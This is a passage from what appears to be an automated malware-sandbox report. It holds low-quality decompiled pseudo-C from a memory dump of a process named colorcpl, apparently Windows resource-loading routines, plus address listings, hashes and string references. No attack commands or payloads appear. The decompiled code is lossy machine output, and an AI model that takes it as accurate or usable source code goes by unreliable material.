																goto L139;
															}
															__eflags =  *__eax - 0xfecdfecd;
															if( *__eax != 0xfecdfecd) {
																goto L139;
															}
															__ecx =  *(__eax + 0x7c);
															__eflags = __ecx;
															if(__ecx == 0) {
																goto L139;
															}
															 &_v228 = E04385050(__ecx,  &_v228,  &_v228);
															 &_v196 =  &_v228;
															__eax = E043656E0( &_v228,  &_v196);
															__eflags = __al;
															if(__al == 0) {
																goto L139;
															}
															__si = _v196;
															_v64 = __si;
															goto L165;
														case 8:
															__si = _v76;
															_v64 = __si;
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) != 0) {
																goto L164;
															}
															__eflags =  *[fs:0x18];
															if( *[fs:0x18] == 0) {
																__ebx = _a8;
																__si = _v64;
															} else {
																__esi =  *[fs:0x18];
																__si =  *((intOrPtr*)(__esi + 0xc4));
																_v64 = __si;
																__ebx = _a8;
															}
															goto L165;
														case 9:
															__si = _v76;
															_v64 = __si;
															__eax =  &_v168;
															_push( &_v168);
															_push(1);
															__eax = E04382AE0();
															_v72 = __eax;
															__eflags = __eax;
															if(__eax >= 0) {
																__si = _v168;
																_v64 = __si;
															}
															goto L165;
														case 0xa:
															__si = _v76;
															_v64 = __si;
															__eax =  &_v200;
															_push( &_v200);
															_push(0);
															__eax = E04382AE0();
															_v72 = __eax;
															__eflags = __eax;
															if(__eax >= 0) {
																__eax = _v200;
																__eflags = __eax - _v168;
																if(__eax != _v168) {
																	__si = __ax;
																	_v64 = __si;
																}
															}
															goto L165;
														case 0xb:
															__esi = 0x409;
															_v64 = __si;
															goto L165;
														case 0xc:
															L164:
															__ebx = __ebx | 0x00000020;
															__eflags = __ebx;
															_a8 = __ebx;
															L165:
															_t468 =  !_t555;
															__eflags = _t468 & 0x00000020;
															if((_t468 & 0x00000020) == 0) {
																L168:
																_v76 = _t643 & 0x0000ffff;
																_t470 =  &_v76;
																_v100 = _t470;
																_v152 = _t470;
																_t626 = _v132;
																_v148 = _t626;
																goto L169;
															}
															__eflags = (_t643 & 0x0000ffff) - _v76;
															if((_t643 & 0x0000ffff) != _v76) {
																goto L168;
															}
															_t612 = _v88;
															L106:
															goto L107;
													}
												}
												L90:
												_t443 = _t555 & 0x00000002;
												__eflags = _t568;
												if(_t568 == 0) {
													L97:
													__eflags = _t626;
													if(_t626 == 0) {
														L100:
														_t612 = _v88;
														_t446 = _t612 - _v124 - 1;
														__eflags = _t446;
														if(_t446 == 0) {
															_t627 = 0xc000008a;
															L210:
															_v72 = _t627;
															L211:
															__eflags = _t555 & 0x02040000;
															if((_t555 & 0x02040000) != 0) {
																L220:
																_t642 = _v92;
																L221:
																__eflags = _t627 - 0xc000008a;
																if(_t627 == 0xc000008a) {
																	L223:
																	_t448 =  !_t555;
																	__eflags = _t448 & 0x00080000;
																	if((_t448 & 0x00080000) == 0) {
																		L231:
																		_v8 = 0xfffffffe;
																		_t432 = _t627;
																		goto L233;
																	}
																	__eflags = _t448 & 0x00020000;
																	if((_t448 & 0x00020000) == 0) {
																		goto L231;
																	}
																	__eflags = _t448 & 0x00000010;
																	if((_t448 & 0x00000010) == 0) {
																		goto L231;
																	}
																	__eflags = _v88 - 3;
																	if(_v88 != 3) {
																		goto L231;
																	}
																	_v48 =  *_t642;
																	_v44 =  *((intOrPtr*)(_t642 + 4));
																	_v40 =  *((intOrPtr*)(_t642 + 8));
																	_t569 = _a4;
																	__eflags = _t569 - 4;
																	if(_t569 == 4) {
																		_v36 =  *((intOrPtr*)(_t642 + 0xc));
																	}
																	_t612 =  &_v48;
																	_t557 = _v96;
																	_t627 = E0434B9C0(_v96,  &_v48, _t569, _t555, _v108);
																	_v72 = _t627;
																	__eflags = _t627;
																	if(_t627 < 0) {
																		goto L231;
																	} else {
																		_t612 = 0;
																		E04340C12(_t557, 0,  &_v48, _a4);
																		_v8 = 0xfffffffe;
																		_t432 = _t627;
																		goto L233;
																	}
																}
																__eflags = _t627 - 0xc000008b;
																if(_t627 != 0xc000008b) {
																	goto L231;
																}
																goto L223;
															}
															__eflags = _t627 - 0xc000008a;
															if(_t627 == 0xc000008a) {
																L214:
																_t642 = _v92;
																__eflags = _t612 - 3;
																if(_t612 == 3) {
																	_v48 =  *_t642;
																	_v44 =  *((intOrPtr*)(_t642 + 4));
																	_v40 =  *((intOrPtr*)(_t642 + 8));
																	_t573 = _a4;
																	__eflags = _t573 - 4;
																	if(_t573 == 4) {
																		_v36 =  *((intOrPtr*)(_t642 + 0xc));
																	}
																	_t612 =  &_v48;
																	_t461 = E0434B9C0(_v96,  &_v48, _t573, _t555 | 0x01000000, _v108);
																	__eflags = _t461 - 0xc00b0001;
																	if(_t461 != 0xc00b0001) {
																		__eflags = _t461 - 0xc00b0006;
																		if(_t461 != 0xc00b0006) {
																			_t627 = _t461;
																			_v72 = _t627;
																		}
																	}
																}
																goto L221;
															}
															__eflags = _t627 - 0xc000008b;
															if(_t627 != 0xc000008b) {
																goto L220;
															}
															goto L214;
														}
														_t463 = _t446 - 1;
														__eflags = _t463;
														if(_t463 == 0) {
															_t627 = 0xc000008b;
															goto L210;
														}
														__eflags = _t463 == 1;
														if(_t463 == 1) {
															_t627 = 0xc0000204;
															_v72 = 0xc0000204;
															__eflags = _v132;
															if(_v132 == 0) {
																goto L211;
															}
															_v136 = 0;
															goto L106;
														}
														_t627 = 0xc000000d;
														goto L210;
													}
													__eflags = _t443;
													if(_t443 == 0) {
														goto L100;
													}
													 *_v108 = _t626;
													_t627 = 0;
													_t612 = _v88;
													goto L210;
												}
												__eflags = _t443;
												if(_t443 != 0) {
													goto L97;
												}
												 *_v108 = _t568;
												_t509 =  *[fs:0x18];
												__eflags =  *(_t509 + 0xfe0);
												if( *(_t509 + 0xfe0) == 0) {
													_v100 =  *[fs:0x18];
													_v100[0x3f8] = E04355D90(_t568,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xc);
												}
												_t510 =  *[fs:0x18];
												__eflags =  *(_t510 + 0xfe0);
												if( *(_t510 + 0xfe0) != 0) {
													_t615 = _v96;
													 *( *( *[fs:0x18] + 0xfe0)) = _t615;
													( *( *[fs:0x18] + 0xfe0))[1] = _v136;
													( *( *[fs:0x18] + 0xfe0))[2] = _t615;
												}
												_t627 = 0;
												_v72 = 0;
												_t555 = _a8;
												_t612 = _v88;
												goto L211;
											}
										}
										_v8 = 0xfffffffe;
										_t432 = 0xc0000089;
										goto L233;
									}
									L77:
									_t626 = 0;
									L78:
									_v128 = _t626;
									goto L79;
								}
								_t520 =  *(_t567 + 0x18) & 0x0000ffff;
								_t612 = 0x10b;
								if(_t520 != 0x10b) {
									_t612 = 0x20b;
									__eflags = _t520 - 0x20b;
									if(__eflags != 0) {
										goto L77;
									}
									_t612 = E04337386(_t640, _v80, 2,  &_v180, _t567,  &_v128);
									_t626 = _v128;
									goto L76;
								}
								if( *((intOrPtr*)(_t567 + 0x74)) <= 2) {
									goto L77;
								}
								_t640 =  *(_t567 + 0x88);
								if(_t640 == 0) {
									goto L77;
								}
								_v180 =  *(_t567 + 0x8c);
								if(_v80 != 0 || _t640 <  *((intOrPtr*)(_t567 + 0x54))) {
									_t626 = _v160 + _t640;
									goto L78;
								} else {
									_t57 = _v120 + 0x18; // 0x18
									_t612 = _t57 + ( *(_t567 + 0x14) & 0x0000ffff);
									_t559 =  *(_v120 + 6) & 0x0000ffff;
									_t598 = 0;
									while(1) {
										_v208 = _t598;
										_v192 = _t612;
										if(_t598 >= _t559) {
											break;
										}
										_t633 =  *((intOrPtr*)(_t612 + 0xc));
										if(_t640 < _t633 || _t640 >=  *((intOrPtr*)(_t612 + 0x10)) + _t633) {
											_t612 = _t612 + 0x28;
											_t598 = _t598 + 1;
											continue;
										} else {
											if(_t612 == 0) {
												break;
											} else {
												_t626 =  *((intOrPtr*)(_t612 + 0x14)) -  *((intOrPtr*)(_t612 + 0xc)) + _t640 + _v160;
												L71:
												_v128 = _t626;
												_t555 = _a8;
												_v100 = _v152;
												if(_t626 == 0) {
													goto L77;
												}
												_t612 = 0;
												goto L76;
											}
										}
									}
									_t626 = 0;
									__eflags = 0;
									goto L71;
								}
							}
							_t26 = _t565 - 1; // 0x2
							if(_t26 > 2) {
								goto L25;
							} else {
								if(_t565 != 3) {
									_t536 = 0;
									__eflags = 0;
								} else {
									_t536 =  *(_t612 + 8) & 0x0000ffff;
								}
								_v120 = _t536;
								_v84 = _t536;
								_t599 =  *_t612;
								if(_t599 == 0x10 || _t599 == 0x18) {
									L20:
									if((_v144 & 0x00000008) == 0 || _t536 != 0 && _t536 != 0x400 && _t536 != 0x800) {
										goto L39;
									} else {
										_t555 = _t555 | 0x00000010;
										_a8 = _t555;
										goto L25;
									}
								} else {
									if((_t599 & 0xffff0000) == 0 || E043879A0(_t599, L"MUI") != 0) {
										L39:
										_v112 = 0;
										_v140 = 0;
										_v104 = 0;
										_t612 = 0;
										_t537 = E0434D530(_t624, 0, 0, 8);
										_v104 = _t537;
										__eflags = _t537 - 0xffffffff;
										if(_t537 == 0xffffffff) {
											L55:
											_t601 = 0x80000;
											L56:
											_v112 = _t601;
											L57:
											_t555 = _t555 | _t601;
											_a8 = _t555;
											__eflags = _t555 & 0x00040000;
											if((_t555 & 0x00040000) == 0) {
												goto L25;
											}
											_t432 = 0xc000008a;
											_v72 = 0xc000008a;
											__eflags = _t555 & 0x00020000;
											if((_t555 & 0x00020000) == 0) {
												_t602 = _v100;
												_v48 =  *_t602;
												_t620 = _v88;
												__eflags = _t620 - 2;
												if(_t620 < 2) {
													_t539 = 0;
													__eflags = 0;
												} else {
													_t539 = _t602[1];
												}
												_v44 = _t539;
												__eflags = _t620 - 3;
												if(_t620 != 3) {
													_t540 = 0;
													__eflags = 0;
												} else {
													_t540 = _t602[2];
												}
												_v40 = _t540;
												__eflags = _t638 - 4;
												if(_t638 == 4) {
													_v36 = _t602[3];
												}
												_t612 =  &_v48;
												_v72 = E0434B9C0(_t624,  &_v48, _t638, _t555, _v108);
											}
											goto L68;
										}
										__eflags = _t537;
										if(__eflags != 0) {
											L49:
											_push( &_v112);
											_push(_t555);
											_push( *_v100);
											_push(_t537);
											_t543 = E0434E7F0(_t555, _t624, _t638, __eflags);
											__eflags = _t543;
											if(_t543 >= 0) {
												_t544 = _v104;
												_t601 = _v112;
												__eflags =  *(_t544 + 0x14) & 0x00000100;
												if(( *(_t544 + 0x14) & 0x00000100) != 0) {
													_t601 = _t601 | 0x00100000;
													__eflags = _t601;
													_v112 = _t601;
												}
												__eflags =  *(_t544 + 0x10) & 0x00000010;
												if(( *(_t544 + 0x10) & 0x00000010) == 0) {
													goto L57;
												}
												_t601 = _t601 | 0x00200000;
											} else {
												_t601 = 0x60000;
											}
											goto L56;
										}
										_v60 = L"MUI";
										_v56 = 1;
										_v52 = _t537;
										_t546 = E0434C6E0(_t624,  &_v60, 3, 0x2000030,  &_v176);
										_t607 = _t546;
										_v184 = _t607;
										__eflags = _t607;
										if(__eflags >= 0) {
											_t607 = E0434DA30(_t624, _v176,  &_v104,  &_v140);
											_v184 = _t607;
											__eflags = _t607;
											if(__eflags < 0) {
												L46:
												_v104 = 0;
												_t551 = 0xffffffff;
												goto L48;
											}
											_t551 = _v104;
											__eflags =  *_t551 - 0xfecdfecd;
											if(__eflags == 0) {
												_v140 = 0;
												goto L48;
											} else {
												_t607 = 0xc000007b;
												_v184 = 0xc000007b;
												goto L46;
											}
										} else {
											_v104 = 0;
											_t551 = _t546 | 0xffffffff;
											L48:
											_push(0);
											_push(_t607);
											_push(2);
											_push(0);
											_push(_t551);
											_push(0);
											_t612 = 0;
											E043493A6(_t555, _t624, 0, _t624, _t638, __eflags);
											_t537 = _v104;
											__eflags = _t537;
											if(__eflags == 0) {
												goto L55;
											}
											goto L49;
										}
									} else {
										_t536 = _v120;
										goto L20;
									}
								}
							}
						}
						if(_t435 == 0) {
							goto L232;
						}
						if(_t638 != _t638) {
							goto L9;
						} else {
							_t565 = 3;
							_v88 = 3;
							goto L10;
						}
					} else {
						goto L232;
					}
				} else {
					L232:
					_t432 = 0xc00000f1;
					L233:
					 *[fs:0x0] = _v20;
					_pop(_t625);
					_pop(_t639);
					_pop(_t556);
					return E04384B50(_t432, _t556, _v32 ^ _t647, _t612, _t625, _t639);
				}
			}

0x0434c6e0
0x0434c6e5
0x0434c6e7
0x0434c6ec
0x0434c6f7
0x0434c6fe
0x0434c703
0x0434c706
0x0434c708
0x0434c70e
0x0434c712
0x0434c718
0x0434c71b
0x0434c71e
0x0434c720
0x0434c723
0x0434c72c
0x0434c72f
0x0434c732
0x0434c736
0x0434c740
0x0434c74a
0x0434c74d
0x0434c753
0x0434c761
0x00000000
0x00000000
0x0434c769
0x0434c76c
0x0434c77a
0x0434c792
0x0434c792
0x0434c794
0x0434c797
0x0434c797
0x0434c79a
0x0434c7a3
0x0434c7a5
0x0434c7ad
0x0434c82c
0x0434c82e
0x0434c831
0x0434c834
0x0434c836
0x0434c83c
0x0434c843
0x0434c845
0x0434c84b
0x0434c853
0x0434c859
0x0434c85f
0x0434c85f
0x0434c875
0x0434c877
0x0434c87c
0x0434cb19
0x0434cb1b
0x0434cb22
0x0434cb22
0x0434cb2a
0x0434cb4e
0x0434cb53
0x0434cb56
0x0434cb58
0x0434caba
0x0434caba
0x00000000
0x0434caba
0x0434cb5e
0x0434cb64
0x0434cb6b
0x0434cb72
0x0434cb74
0x0434cb7a
0x0434cb7f
0x0434cb83
0x0434cb85
0x0434cb89
0x0434cb90
0x0434cb90
0x0434cb92
0x00000000
0x00000000
0x0434cb94
0x0434cb99
0x0434cb9a
0x0434cb9d
0x0434cb9f
0x00000000
0x00000000
0x0434cba1
0x0434cba3
0x0434cba6
0x0434cba8
0x0434cbab
0x0434cbad
0x0434cbad
0x0434cbab
0x0434cbb0
0x0434cbb4
0x0434d045
0x0434d045
0x0434d049
0x0434d053
0x0434d060
0x0434d066
0x0434d06b
0x0434d06e
0x0434d070
0x00000000
0x00000000
0x0434d07d
0x0434d088
0x0434d08d
0x0434d090
0x0434d092
0x00000000
0x00000000
0x0434d098
0x0434d098
0x0434d09b
0x0434d0a1
0x0434d0a9
0x0434d0af
0x0434d0bd
0x0434d0bf
0x0434d0d2
0x0434d0d8
0x0434d0e2
0x0434d0e4
0x0434d0ea
0x0434d0ef
0x0434d0f2
0x0434d0f8
0x0434d0ff
0x0434d0ff
0x0434d106
0x0434d109
0x0434d238
0x0434d23c
0x0434d270
0x0434d28c
0x0434d294
0x0434d299
0x0434d29b
0x00000000
0x00000000
0x0434d2a4
0x0434d2a7
0x0434d2aa
0x0434d2b0
0x0434d2b6
0x00000000
0x0434d2b6
0x0434d23e
0x0434d241
0x00000000
0x00000000
0x0434d243
0x0434d245
0x0434d24d
0x0434d253
0x0434d259
0x0434d25f
0x00000000
0x00000000
0x0434d265
0x00000000
0x0434d10f
0x0434d10f
0x0434d117
0x0434d117
0x0434d11a
0x0434d150
0x0434d155
0x0434d155
0x0434d158
0x0434d15b
0x0434d161
0x0434d1b4
0x0434d1b4
0x0434d1ba
0x0434d1c4
0x0434d1c6
0x0434d1c8
0x0434d1cd
0x0434d1cf
0x0434d1d4
0x0434d1d6
0x0434d1d8
0x0434d1da
0x0434d1dd
0x0434d1e1
0x0434d1e7
0x0434d1ed
0x0434d1f0
0x0434d1f3
0x0434d1f6
0x0434d1fb
0x0434d1fb
0x0434d203
0x0434d206
0x0434d210
0x0434d212
0x0434d215
0x0434d217
0x0434d221
0x0434d221
0x0434d225
0x0434d225
0x0434d217
0x0434d1dd
0x0434d1d8
0x0434d1d4
0x0434d22a
0x0434d22a
0x0434d231
0x00000000
0x0434d231
0x0434d1bc
0x0434d1c2
0x00000000
0x00000000
0x00000000
0x0434d1c2
0x0434d163
0x0434d166
0x00000000
0x00000000
0x0434d16a
0x0434d170
0x0434d176
0x0434d179
0x0434d17c
0x0434d17f
0x0434d184
0x0434d184
0x0434d193
0x0434d199
0x0434d19e
0x0434d1a1
0x0434d1a6
0x0434d1a8
0x0434d1ad
0x00000000
0x00000000
0x0434d1af
0x0434d1b1
0x0434d1b1
0x0434d1b1
0x00000000
0x0434d1a6
0x0434d11c
0x0434d11c
0x0434d11f
0x0434d149
0x00000000
0x0434d149
0x0434d121
0x0434d124
0x0434d138
0x0434d13b
0x0434d142
0x00000000
0x0434d142
0x0434d126
0x0434d12b
0x00000000
0x0434d12b
0x0434d109
0x0434d0c1
0x0434d0c1
0x0434d0c8
0x00000000
0x0434cbba
0x0434cbbc
0x0434cbc3
0x0434cbc7
0x0434cbd0
0x0434cbd3
0x0434cce1
0x0434cce1
0x0434cce4
0x0434cce7
0x0434ccea
0x0434cdcc
0x0434cdcc
0x0434cdd3
0x00000000
0x0434cdd3
0x0434ccf0
0x00000000
0x0434ccf9
0x0434ccfd
0x0434cd0a
0x0434cd10
0x00000000
0x00000000
0x00000000
0x0434cd10
0x00000000
0x00000000
0x0434cd23
0x0434cd25
0x0434cd27
0x0434cd2c
0x00000000
0x00000000
0x0434cd32
0x0434cd37
0x00000000
0x00000000
0x0434cd3d
0x0434cd3f
0x00000000
0x00000000
0x0434cd45
0x0434cd47
0x0434cd4a
0x0434cd4d
0x0434cd54
0x0434cd54
0x0434cd4f
0x0434cd4f
0x0434cd4f
0x0434cd56
0x0434cd59
0x0434cd5c
0x0434cd63
0x0434cd63
0x0434cd5e
0x0434cd5e
0x0434cd5e
0x0434cd65
0x0434cd68
0x0434cd6b
0x0434cd6e
0x0434cd70
0x0434cd73
0x0434cd73
0x0434cd7b
0x0434cd7e
0x0434cd81
0x0434cd86
0x0434cd88
0x0434cd8b
0x0434cd8d
0x00000000
0x0434cd93
0x0434cd94
0x0434cd98
0x0434cd9a
0x0434cd9d
0x0434cda2
0x0434cda9
0x00000000
0x0434cda9
0x00000000
0x0434cdb0
0x0434cdb4
0x0434cd16
0x0434cd16
0x0434cd1a
0x00000000
0x0434cd1a
0x0434cdba
0x0434cdbe
0x00000000
0x00000000
0x0434cdc7
0x0434cdca
0x0434cddd
0x0434cde1
0x0434cdf0
0x0434cdf6
0x0434cdfb
0x0434cdfd
0x0434ccff
0x0434ccff
0x0434cd01
0x00000000
0x0434cd01
0x0434ce03
0x0434ce07
0x0434ce0a
0x0434ce10
0x0434ce10
0x00000000
0x0434ce0a
0x0434cde3
0x0434cde7
0x00000000
0x0434cde7
0x00000000
0x00000000
0x0434ce18
0x0434ce1c
0x0434ce2b
0x0434ce2f
0x0434ce32
0x0434ce1e
0x0434ce1e
0x0434ce22
0x0434ce22
0x00000000
0x00000000
0x0434ce3b
0x0434ce3f
0x00000000
0x00000000
0x00000000
0x00000000
0x0434ce4e
0x0434ce52
0x0434ce56
0x0434ce59
0x00000000
0x00000000
0x0434ce5f
0x0434ce61
0x0434ce65
0x0434ce6a
0x0434ce6c
0x0434cedb
0x0434cedd
0x0434cee1
0x0434cee5
0x00000000
0x0434cee5
0x0434ce74
0x0434ce7a
0x0434ce7e
0x0434ce84
0x0434cec5
0x0434cec5
0x0434cec7
0x0434cecb
0x0434cecb
0x0434cece
0x0434ced2
0x00000000
0x0434ced2
0x0434ce86
0x0434ce94
0x0434ce98
0x0434ce9f
0x0434cea5
0x0434ceaa
0x0434ceae
0x0434ceb1
0x00000000
0x00000000
0x0434ceb3
0x0434ceb4
0x0434ceba
0x0434cebd
0x00000000
0x00000000
0x0434ceee
0x0434cef0
0x0434cef2
0x0434cef7
0x0434ce41
0x0434ce41
0x0434ce45
0x00000000
0x0434ce45
0x0434cf01
0x0434cf04
0x0434cf09
0x0434cf0b
0x00000000
0x00000000
0x0434cf11
0x0434cf17
0x00000000
0x00000000
0x0434cf1d
0x0434cf20
0x0434cf22
0x00000000
0x00000000
0x0434cf32
0x0434cf3e
0x0434cf45
0x0434cf4a
0x0434cf4c
0x00000000
0x00000000
0x0434cf52
0x0434cf59
0x00000000
0x00000000
0x0434cf62
0x0434cf66
0x0434cf6a
0x0434cf6c
0x0434cf6e
0x0434cf73
0x00000000
0x00000000
0x0434cf79
0x0434cf81
0x0434cf9a
0x0434cf9d
0x0434cf83
0x0434cf83
0x0434cf8a
0x0434cf91
0x0434cf95
0x0434cf95
0x00000000
0x00000000
0x0434cfa3
0x0434cfa7
0x0434cfab
0x0434cfb1
0x0434cfb2
0x0434cfb4
0x0434cfb9
0x0434cfbc
0x0434cfbe
0x0434cfc0
0x0434cfc7
0x0434cfc7
0x00000000
0x00000000
0x0434cfcd
0x0434cfd1
0x0434cfd5
0x0434cfdb
0x0434cfdc
0x0434cfde
0x0434cfe3
0x0434cfe6
0x0434cfe8
0x0434cfea
0x0434cff0
0x0434cff6
0x0434cff8
0x0434cffb
0x0434cffb
0x0434cff6
0x00000000
0x00000000
0x0434d001
0x0434d006
0x00000000
0x00000000
0x0434d00c
0x0434d00c
0x0434d00c
0x0434d00f
0x0434d012
0x0434d014
0x0434d016
0x0434d018
0x0434d02a
0x0434d02d
0x0434d030
0x0434d033
0x0434d036
0x0434d03c
0x0434d03f
0x00000000
0x0434d03f
0x0434d01d
0x0434d020
0x00000000
0x00000000
0x0434d022
0x0434ccd9
0x00000000
0x00000000
0x0434ccf0
0x0434cbdc
0x0434cbde
0x0434cbe1
0x0434cbe3
0x0434cc7d
0x0434cc7d
0x0434cc7f
0x0434cc94
0x0434cc94
0x0434cc9c
0x0434cc9c
0x0434cc9f
0x0434d2c8
0x0434d2cd
0x0434d2cd
0x0434d2d0
0x0434d2d0
0x0434d2d6
0x0434d33b
0x0434d33b
0x0434d33e
0x0434d33e
0x0434d344
0x0434d352
0x0434d354
0x0434d356
0x0434d35b
0x0434d3ef
0x0434d3ef
0x0434d3f6
0x00000000
0x0434d3f6
0x0434d361
0x0434d366
0x00000000
0x00000000
0x0434d36c
0x0434d36e
0x00000000
0x00000000
0x0434d374
0x0434d378
0x00000000
0x00000000
0x0434d37c
0x0434d382
0x0434d388
0x0434d38b
0x0434d38e
0x0434d391
0x0434d396
0x0434d396
0x0434d39e
0x0434d3a1
0x0434d3ab
0x0434d3ad
0x0434d3b0
0x0434d3b2
0x00000000
0x0434d3b4
0x0434d3bc
0x0434d3c0
0x0434d3c5
0x0434d3cc
0x00000000
0x0434d3cc
0x0434d3b2
0x0434d346
0x0434d34c
0x00000000
0x00000000
0x00000000
0x0434d34c
0x0434d2d8
0x0434d2de
0x0434d2e8
0x0434d2e8
0x0434d2eb
0x0434d2ee
0x0434d2f2
0x0434d2f8
0x0434d2fe
0x0434d301
0x0434d304
0x0434d307
0x0434d30c
0x0434d30c
0x0434d31b
0x0434d321
0x0434d326
0x0434d32b
0x0434d32d
0x0434d332
0x0434d334
0x0434d336
0x0434d336
0x0434d332
0x0434d32b
0x00000000
0x0434d2ee
0x0434d2e0
0x0434d2e6
0x00000000
0x00000000
0x00000000
0x0434d2e6
0x0434cca5
0x0434cca5
0x0434cca8
0x0434d2c1
0x00000000
0x0434d2c1
0x0434ccae
0x0434ccb1
0x0434ccbd
0x0434ccc2
0x0434ccc5
0x0434ccc9
0x00000000
0x00000000
0x0434cccf
0x00000000
0x0434cccf
0x0434ccb3
0x00000000
0x0434ccb3
0x0434cc81
0x0434cc83
0x00000000
0x00000000
0x0434cc88
0x0434cc8a
0x0434cc8c
0x00000000
0x0434cc8c
0x0434cbe9
0x0434cbeb
0x00000000
0x00000000
0x0434cbf4
0x0434cbf6
0x0434cbfc
0x0434cc03
0x0434cc0b
0x0434cc23
0x0434cc23
0x0434cc29
0x0434cc2f
0x0434cc36
0x0434cc44
0x0434cc47
0x0434cc5b
0x0434cc6a
0x0434cc6a
0x0434cc6d
0x0434cc6f
0x0434cc72
0x0434cc75
0x00000000
0x0434cc75
0x0434cb90
0x0434cb2c
0x0434cb33
0x00000000
0x0434cb33
0x0434cb1d
0x0434cb1d
0x0434cb1f
0x0434cb1f
0x00000000
0x0434cb1f
0x0434c882
0x0434c886
0x0434c88e
0x0434caf2
0x0434caf7
0x0434cafa
0x00000000
0x00000000
0x0434cb14
0x0434cb16
0x00000000
0x0434cb16
0x0434c898
0x00000000
0x00000000
0x0434c89e
0x0434c8a6
0x00000000
0x00000000
0x0434c8b2
0x0434c8bc
0x0434caee
0x00000000
0x0434c8cb
0x0434c8d5
0x0434c8d8
0x0434c8da
0x0434c8de
0x0434c8e0
0x0434c8e0
0x0434c8e6
0x0434c8ee
0x00000000
0x00000000
0x0434c8f4
0x0434c8f9
0x0434cac6
0x0434cac9
0x00000000
0x0434c90c
0x0434c90e
0x00000000
0x0434c914
0x0434c91c
0x0434cad1
0x0434cad1
0x0434cad4
0x0434cadd
0x0434cae2
0x00000000
0x00000000
0x0434cae4
0x00000000
0x0434cae4
0x0434c90e
0x0434c8f9
0x0434cacf
0x0434cacf
0x00000000
0x0434cacf
0x0434c8bc
0x0434c7af
0x0434c7b5
0x00000000
0x0434c7b7
0x0434c7ba
0x0434c7c2
0x0434c7c2
0x0434c7bc
0x0434c7bc
0x0434c7bc
0x0434c7c4
0x0434c7c7
0x0434c7cb
0x0434c7d0
0x0434c7fc
0x0434c803
0x00000000
0x0434c826
0x0434c826
0x0434c829
0x00000000
0x0434c829
0x0434c7d7
0x0434c7dd
0x0434c927
0x0434c927
0x0434c92e
0x0434c938
0x0434c943
0x0434c947
0x0434c94c
0x0434c94f
0x0434c952
0x0434ca4a
0x0434ca4a
0x0434ca4f
0x0434ca4f
0x0434ca52
0x0434ca52
0x0434ca54
0x0434ca57
0x0434ca5d
0x00000000
0x00000000
0x0434ca63
0x0434ca68
0x0434ca6b
0x0434ca71
0x0434ca73
0x0434ca78
0x0434ca7b
0x0434ca7e
0x0434ca81
0x0434ca88
0x0434ca88
0x0434ca83
0x0434ca83
0x0434ca83
0x0434ca8a
0x0434ca8d
0x0434ca90
0x0434ca97
0x0434ca97
0x0434ca92
0x0434ca92
0x0434ca92
0x0434ca99
0x0434ca9c
0x0434ca9f
0x0434caa4
0x0434caa4
0x0434caad
0x0434cab7
0x0434cab7
0x00000000
0x0434ca71
0x0434c958
0x0434c95a
0x0434ca09
0x0434ca0c
0x0434ca0d
0x0434ca11
0x0434ca13
0x0434ca14
0x0434ca19
0x0434ca1b
0x0434ca24
0x0434ca27
0x0434ca2a
0x0434ca31
0x0434ca33
0x0434ca33
0x0434ca39
0x0434ca39
0x0434ca3c
0x0434ca40
0x00000000
0x00000000
0x0434ca42
0x0434ca1d
0x0434ca1d
0x0434ca1d
0x00000000
0x0434ca1b
0x0434c960
0x0434c967
0x0434c96e
0x0434c984
0x0434c989
0x0434c98b
0x0434c991
0x0434c993
0x0434c9b9
0x0434c9bb
0x0434c9c1
0x0434c9c3
0x0434c9db
0x0434c9dd
0x0434c9e0
0x00000000
0x0434c9e0
0x0434c9c5
0x0434c9c8
0x0434c9ce
0x0434c9e5
0x00000000
0x0434c9d0
0x0434c9d0
0x0434c9d5
0x00000000
0x0434c9d5
0x0434c995
0x0434c995
0x0434c99c
0x0434c9ef
0x0434c9ef
0x0434c9f1
0x0434c9f2
0x0434c9f4
0x0434c9f6
0x0434c9f7
0x0434c9f9
0x0434c9fd
0x0434ca02
0x0434ca05
0x0434ca07
0x00000000
0x00000000
0x00000000
0x0434ca07
0x0434c7f9
0x0434c7f9
0x00000000
0x0434c7f9
0x0434c7dd
0x0434c7d0
0x0434c7b5
0x0434c77e
0x00000000
0x00000000
0x0434c786
0x00000000
0x0434c788
0x0434c788
0x0434c78d
0x00000000
0x0434c78d
0x00000000
0x00000000
0x00000000
0x0434d3fa
0x0434d3fa
0x0434d3fa
0x0434d3ff
0x0434d402
0x0434d40a
0x0434d40b
0x0434d40c
0x0434d41a
0x0434d41a

Strings

MUI, xrefs: 0434C7E3, 0434C960

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: babce1ed450280255844be5861f2fba7b895765a83f9f520ecfcbe59ae007999
Instruction ID: e776f0f3ebb443214d47cf0b67733b09d47e24f7c3972036966b03b80d567811
Opcode Fuzzy Hash: babce1ed450280255844be5861f2fba7b895765a83f9f520ecfcbe59ae007999
Instruction Fuzzy Hash: 31824C75E012189FEB24CFA9C8807EDB7F5BF88310F15A16AD819AB690E734BD41DB50

Uniqueness

Uniqueness Score: -1.00%

Function 043C60A0 Relevance: 1.5, Strings: 1, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E043C60A0(void* __ecx, void* __edx, signed int* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v24;
				signed int _v28;
				short _v32;
				char _v36;
				signed int* _v40;
				short _v44;
				char _v48;
				intOrPtr* _v52;
				signed int _v56;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t69;
				signed int _t79;
				signed int _t80;
				signed int _t86;
				signed int* _t127;
				signed int _t128;
				signed int _t133;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int _t150;
				signed int _t151;
				signed int _t155;

				_t143 = __edx;
				_v8 =  *0x443b370 ^ _t155;
				_t127 = _a4;
				 *_t127 = 0;
				_t150 = 0;
				_v36 = 0;
				_v48 = 0;
				_v28 = 0;
				_v64 = 0;
				_v40 = _t127;
				_v32 = 0x500;
				_v44 = 0x100;
